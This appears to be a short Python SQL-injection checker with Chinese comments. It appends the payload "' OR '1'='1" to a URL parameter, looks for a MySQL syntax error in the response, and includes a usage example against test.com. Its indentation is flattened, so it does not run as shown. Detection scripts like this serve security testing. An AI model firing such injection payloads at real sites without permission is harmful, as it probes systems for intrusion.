import requests
def check_sqli(url):
test_payload = "' OR '1'='1"
try:
r = requests.get(url + test_payload)
if "error in your SQL syntax" in r.text:
return True
except:
pass
return False
# 使用示例
if check_sqli("http://test.com/page?id=1"):
print("可能存在SQL注入漏洞")